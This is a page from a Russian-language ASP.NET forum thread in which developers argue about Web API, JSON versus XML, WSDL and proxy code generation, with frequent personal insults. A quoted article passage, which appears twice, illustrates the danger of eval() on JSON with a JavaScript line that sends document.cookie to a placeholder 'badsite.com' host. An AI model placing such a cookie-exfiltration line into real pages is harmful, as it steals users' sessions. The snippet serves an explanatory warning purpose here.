powered by simpleCommunicator - 2.0.59     © 2026 Programmizd 02
Целевая тема:
Создать новую тему:
Автор:
Закрыть
Форумы / ASP.NET [игнор отключен] [закрыт для гостей] / webApi кто заюзал в реальных проектах?
25 сообщений из 121, страница 3 из 5
webApi кто заюзал в реальных проектах?
Фотография Яростный Меч
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Dave JohnsonJSON может стать причиной проблем безопасности. Суть заметки сводится к тому, что если вы допускаете вставку вызовов функций наряду с данными в JSON-ответах и используете eval() для обработки ответа, то тем самым вы исполняете произвольный код, фактически, который уже может содержать угрозу безопасности.

Код: javascript
1.
2.
3.
4.
5.
 window.location = <font color="#069">"http://badsite.com?"</font> + document.cookie;
  person : { 
    <font color="#069">"firstName"</font> : <font color="#069">"Subbu"</font>,
    <font color="#069">"lastName"</font> : <font color="#069">"Allamaraju"</font>
  }

Если ответ в примере выше будет выполнен, это вызовет отправку браузером пользовательских cookies на сторонний сайт.почти во всех браузерах есть JSON.parse, в нем парсится только чистый json, в котором нет ни функций, ни даже регексов

а вообще, сама проблема несколько надуманная, мы же eval-им данные со своего сайта.
...
Рейтинг: 0 / 0
Фотография МСУ
Участник
Яростный Меча вообще, сама проблема несколько надуманная, мы же eval-им данные со своего сайта.
Ну я тоже так думал по поводу надуманности, пока не появились $.support.cors, screen scraping на YQL, flash прокси и JSONP.
...
Фотография James Bond FR
Участник
SeVaКодеманки, если им студия ничего не сгенерит, то они ничего сделать не смогут. Муслима, а ты в курсе, что для своих проектов генерацией прокси никто не занимается? Уверен, что нет(см предыдущее утверждение). Мало того, wsdl прикрывают в целях безопасности
Последний раз писал в рукопашную прокси-классы лет так 5 назад, когда нужно было подцепиться к сервисам реализованным на Java :) Можно поинтересоваться в чем сокральное зло генерации прокси?
А wsdl прикрывают только в целях защиты от дурачка, что бы отбиться от хакеров-малолеток, но ни в коей мере закрытие wsdl не может быть основным средством защиты приложения.
...
Фотография hVostt
Участник
МСУWeb API - это бывший WCF Web API. Просто его решили вынести в отдельный проект. Легковестность и RESTful - вот его основная задача. Использовать его для корпоративного SOA неудобно, одно отсутствие кодогенерации прокси сервисом и классов - жирный гвоздь в Web API.

вот вот. а знаешь зачем нужна эта кодогенерация? потому что оверхед такой, что мама дорогая. вручную писать — самоубийство.
посему — какашка она и есть. по большей части оправдывание бессмысленной «безопасности», некоторые недалекие кодеры думают, что чем больше кода, интерфейсов и слоёв, тем конструкция безопасней. расскажи эти байки своему шефу, побольше лапши и неудобоваримых, но крутых терминов на его наивные уши.

пасс на тему «безопасности» XML: как-то прикручивали синхронизацию по CommerceML 2.05 так вот, отдаваемый XML самой последней версии 1С не проходит валидацию своей же схемы . И знаете что саппарт отвечает? Отключите проверку , парсите так... так что в топку. Лишнее ненужное усложнение. Валидность по XSD совершенно не отменяет необходимость проверять полученные данные, в итоге — двойная никому не нужная работа. Какой-то опофеоз обсурда, в котором отдельное старичьё варится и ловит свой извращенный кайф. А слово «корпоративное» вообще убивает напрочь. SOA, WSDL нужны для поддержки старперского говнища. Например приходилось к этому возвращаться, для интеграции с SAP R/3 — прямым наследнием фюрера.

В гетерогенных системах нужны простые, легкие, легковесные стандарты. Каким и является WebAPI.
...
Фотография hVostt
Участник
МСУЯростный Меча вообще, сама проблема несколько надуманная, мы же eval-им данные со своего сайта.
Ну я тоже так думал по поводу надуманности, пока не появились $.support.cors, screen scraping на YQL, flash прокси и JSONP.

делай по уму и не будет проблем. а JSONP легко защищается. одной строчкой кода.
...
Фотография Яростный Меч
Участник
hVosttа JSONP легко защищается. одной строчкой кода.интересно как
...
Фотография hVostt
Участник
Яростный Меч,

к примеру http://habrahabr.ru/post/168461/
...
SeVa
Участник
МСУSeVaИ чем же это xml более безопасен, а json так опасен? Очередной бред?!

Очередная тема, в который ты ничерта не соображаешь.
...Dave JohnsonJSON может стать причиной проблем безопасности. Суть заметки сводится к тому, что если вы допускаете вставку вызовов функций наряду с данными в JSON-ответах и используете eval() для обработки ответа, то тем самым вы исполняете произвольный код, фактически, который уже может содержать угрозу безопасности.

Код: javascript
1.
2.
3.
4.
5.
 window.location = <font color="#069">"http://badsite.com?"</font> + document.cookie;
  person : { 
    <font color="#069">"firstName"</font> : <font color="#069">"Subbu"</font>,
    <font color="#069">"lastName"</font> : <font color="#069">"Allamaraju"</font>
  }

Если ответ в примере выше будет выполнен, это вызовет отправку браузером пользовательских cookies на сторонний сайт.

SeVaКодеманки, если им студия ничего не сгенерит, то они ничего сделать не смогут. Муслима, а ты в курсе, что для своих проектов генерацией прокси никто не занимается? Уверен, что нет(см предыдущее утверждение). Мало того, wsdl прикрывают в целях безопасности
Долбосева, генерация прокси удобна не только не для своих. В крупных компаниях ведутся различные солюшены и прокидывать свои модели в отдельном солюшене никто не будет. Поэтому, опять мимо. Про wsdl поржал. Какая безопасность, акстись.

Муслима, если бы ты работал в крупных компаниях, а в не подвале в одиночестве, то ты подобную хрень здесь не изображал.
Первое - киськин бред.
Второе - еще одно подтверждение твоей никчемности. Зачем нужны прокси с одним мусором, когда уже все и так есть на руках?
А твой убогий xml используют только ламеры, тк это им генерит vs, а сами они не знают, что более пухлого формата просто нет.
...
Фотография МСУ
Участник
hVosttвот вот. а знаешь зачем нужна эта кодогенерация? потому что оверхед такой, что мама дорогая. вручную писать — самоубийство.
посему — какашка она и есть.
Есть xml чуть больше 10Мб. Задача: обработать его и наполнить некий экземпляр класса T для дальнейших теходвижений.
Что я делаю. Автогенерю схему, автогенерю T класс. Беру XmlSerializer и десериализирую в сгенеренный класс T. Время: 30 секунд.
Что ты предлагаешь делать в случае с JSON, лапочка?

P.S. Вот тебе реальный класс на 3.5 тыс строк кода, используется для реальной сложной интеграции двух систем. Я его автоматически сгенерил за секунду. Сколько лет ты будешь писать аналог на JSON?
...
Фотография МСУ
Участник
SeVaМуслима, если бы ты работал в крупных компаниях, а в не подвале в одиночестве, то ты подобную хрень здесь не изображал.
Долбосева, если бы ты имел хоть грамм мозгов, ты бы такие глупые вопросы не задавал.

SeVaПервое - киськин бред.
Аргументами убил наповал. Как обычно, вообщем.

SeVaВторое - еще одно подтверждение твоей никчемности. Зачем нужны прокси с одним мусором, когда уже все и так есть на руках?
А твой убогий xml используют только ламеры, тк это им генерит vs, а сами они не знают, что более пухлого формата просто нет.
Тупая кодеманка, выше привел пример с xsd.
...
Фотография МСУ
Участник
hVosttМСУпропущено...

делай по уму и не будет проблем. а JSONP легко защищается. одной строчкой кода.
Не убедительный ответ.
...
Фотография МСУ
Участник
Схватился за живот. Вот тут долбосева отжигает 14377177
...
Фотография hVostt
Участник
МСУ,

Открой уже для себя наконец http://james.newtonking.com/projects/json-net.aspx

А с XML уже давно приятней работать через XML to LINQ.

Если XML 10 Мб и больше, уже пора задуматься, правильный ли транспорт выбран? Для транспорта огромных массивов данных XML — плохая, отвратительная идея. Как в прочем и JSON. Бинарный формат. Для порций тот же SQLite контейнер аще сказка.
...
Фотография hVostt
Участник
Код: c#
1.
Product deserializedProduct = JsonConvert.DeserializeObject<Product>(json);

одна строчка кода. как сложно-то.
...
Фотография МСУ
Участник
hVosttМСУ, Открой уже для себя наконец http://james.newtonking.com/projects/json-net.aspx

1. Ты к чему это ляпнул? Тем более в дотнете есть родной DataContractJsonSerializer. RTFM.
2. Ты меня опять не понял. Ты через json-конвертер конвертерируешь json строку или файл в модель. А модель у тебя откуда? Самому писать? Я ж тебе привел модель на 3.5K строк кода. А тебе придется ее писать руками.

hVosttА с XML уже давно приятней работать через XML to LINQ.
С XML приятно работать и с LINQ тоже.

hVosttЕсли XML 10 Мб и больше, уже пора задуматься, правильный ли транспорт выбран?
Правильный. 10Мб у меня трансформируются в экземпляр через сериализатор за 0.5 сек и через SqlBulkCopy уходит в таблтцу БД. На всё про всё - 1 секунда.

hVosttДля транспорта огромных массивов данных XML — плохая, отвратительная идея. Как в прочем и JSON. Бинарный формат. Для порций тот же SQLite контейнер аще сказка.
Огромных - да. 10Мб - это не огромный размер.
...
Фотография МСУ
Участник
hVostt
1.
Product deserializedProduct = JsonConvert.DeserializeObject<Product>(json);

одна строчка кода. как сложно-то.

Жжёшь Как же с тобой трудно...
...
Фотография МСУ
Участник
hVostt, вот тебе базы данных фиаса (альтернатива кладра): http://fias.nalog.ru/Public/DownloadPage.aspx
Месячные дельты данных ~20Мб (архив по ~1 мегабайту). И всё отлично.
Интегрироваться с таким сервисом проще пареной репы. Вот у них схема на 16 метров: http://fias.nalog.ru/Public/Docs/Выгрузка из ФИАС в XML xsd схемы.zip
Кодогенерируем классы и всё готово. Никакого ручного кодирования по трансформации данных.

С случае же JSON ты бы упоролся изучать этот бред и писать руками модели.
...
Фотография hVostt
Участник
МСУ,

то, что даёт на выходе xds.exe — жалкое зрелище.

1. нет поддержки Nullable — вместо этого XXXSpecified — ппц
2. коллекции с разными типами у нас тупо object[]
3. автопроперти нетю... реализация xsd2code вообще тупит

короче отстой.

если ты незнаешь с какой моделью ты работаешь, что ж за код ты пишешь тогда?

в случае с JSON, если можно через 10 секунд уже работать с dynamic в чем вопрос?

нагенерить классов? я смотрю ты просто тащишься от кодогерации
может ты как программист и не нужен вовсе? нужен большой кодогенератор, создающий программу по ТЗ заказчика автоматически.
...
Фотография hVostt
Участник
МСУhVostt, вот тебе базы данных фиаса (альтернатива кладра): http://fias.nalog.ru/Public/DownloadPage.aspx
Месячные дельты данных ~20Мб (архив по ~1 мегабайту). И всё отлично.
Интегрироваться с таким сервисом проще пареной репы. Вот у них схема на 16 метров: http://fias.nalog.ru/Public/Docs/Выгрузка из ФИАС в XML xsd схемы.zip
Кодогенерируем классы и всё готово. Никакого ручного кодирования по трансформации данных.

С случае же JSON ты бы упоролся изучать этот бред и писать руками модели.

в любом случае придется изучать, что там внутри. с кодогенерацией или без.
с фиас уже давно работаю, кстати, обошёлся без их схемы для генерации кода.
беру то, что нужно без всяких проблем. тоже самое было бы, если б они отдавали JSON, но объёмы были бы существенно меньше. на порядок я бы сказал.
...
Фотография МСУ
Участник
hVosttМСУ, то, что даёт на выходе xds.exe — жалкое зрелище.
Если не осилил, то да.

hVostt1. нет поддержки Nullable — вместо этого XXXSpecified — ппц
Садись, два.
Код: xml
1.
<xs:element name="Port" type="xs:int" nillable="true" />

1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
private System.Nullable<int> portField;
[System.Xml.Serialization.XmlElementAttribute(IsNullable = true)]
public System.Nullable<int> Port {
    get {
        return this.portField;
    }
    set {
        this.portField = value;
    }
}

hVostt2. коллекции с разными типами у нас тупо object[]
И это правильно. Умей проектировать xsd схемы. Гадать на кофейной гуще никто не будет.

hVostt3. автопроперти нетю... реализация xsd2code вообще тупит
Фиолетово на автосвойства. Мне время дороже, сгенерил и забыл.

hVosttкороче отстой.
Альтернатива? Писать руками класс в 3.5K кода для JSON?

hVosttесли ты незнаешь с какой моделью ты работаешь, что ж за код ты пишешь тогда?
Выйди из сумрака. Я знаю с какой моделью нужно работать, вопрос в том, кто и закое время мне ее напишет. Видел сайт фиаса? За сколько месяцев ты напишешь классы? Я их сгенерю по схеме за 3 секунды.

hVosttв случае с JSON, если можно через 10 секунд уже работать с dynamic в чем вопрос?
Я плакал... Динамическое ковыряние в нетипизированной модели - уволить без выплаты заработной платы.

hVosttнагенерить классов? я смотрю ты просто тащишься от кодогерации
может ты как программист и не нужен вовсе? нужен большой кодогенератор, создающий программу по ТЗ заказчика автоматически.
Ты просто начинающий ламер :)
...
Фотография МСУ
Участник
hVosttв любом случае придется изучать, что там внутри. с кодогенерацией или без.
Изучать != писать

hVosttс фиас уже давно работаю, кстати, обошёлся без их схемы для генерации кода.
беру то, что нужно без всяких проблем. тоже самое было бы, если б они отдавали JSON, но объёмы были бы существенно меньше. на порядок я бы сказал.
Вот тут подробнее, выделил красным. Покажи кодом, как ты работаешь? :)
...
Фотография skyANA
Участник
Что-то не пойму как связан WebAPI и ФИАС. Парни, о чём срач?
...
Фотография hVostt
Участник
МСУhVostt1. нет поддержки Nullable — вместо этого XXXSpecified — ппц
Садись, два.
Код: xml
1.
<xs:element name="Port" type="xs:int" nillable="true" />

Ну и кто это для тебя делать будет? ФИАС не стали.

МСУhVosttкороче отстой.
Альтернатива? Писать руками класс в 3.5K кода для JSON?

Пиши для того, что тебе нужно. Зачем тебе ВСЁ?
Всё равно тебе с этими классами надо будет работать по определенному
алгоритму. Для решений «наскоряк» dynamic на порядок быстрее чем квест
с генерацией.

МСУhVosttесли ты незнаешь с какой моделью ты работаешь, что ж за код ты пишешь тогда?
Выйди из сумрака. Я знаю с какой моделью нужно работать, вопрос в том, кто и закое время мне ее напишет. Видел сайт фиаса? За сколько месяцев ты напишешь классы? Я их сгенерю по схеме за 3 секунды.

Я буду брать только то, что мне нужно.
Если я не знаю, то и не работаю с этим, и вообще теряется весь смысл.

МСУhVosttв случае с JSON, если можно через 10 секунд уже работать с dynamic в чем вопрос?
Я плакал... Динамическое ковыряние в нетипизированной модели - уволить без выплаты заработной платы.

Зато это работает. И сразу. Если тебе приставили дуло к виску и засекли 30 секунд, я посмотрю как ты побежишь заниматься кодогенерации. В других случаях действует правило проектирование, которое гласит: «ЗНАЙ М.. Т..Ю с чем ты работаешь!»
...
Фотография hVostt
Участник
МСУhVosttс фиас уже давно работаю, кстати, обошёлся без их схемы для генерации кода.
Вот тут подробнее, выделил красным. Покажи кодом, как ты работаешь? :)

Суть такая: данные напрямую заливаются в БД из XML, те что нужны.
Генерить для одной единственной операции, где мы тупо переносим данные из XML — глупо.
...
Фотография a_titeev
Участник
skyANAЧто-то не пойму как связан WebAPI и ФИАС. Парни, о чём срач? да уж...

тема потеряна? говорили о выборе платформы для реализации rest api!!! не более. ))
...
25 сообщений из 121, страница 3 из 5
Форумы / ASP.NET [игнор отключен] [закрыт для гостей] / webApi кто заюзал в реальных проектах?
Найденые пользователи ...
Разблокировать пользователей ...
Читали форум (0):
Пользователи онлайн (0):
x
x
Закрыть

Просмотр
0 / 0
Close
Debug Console [Select Text]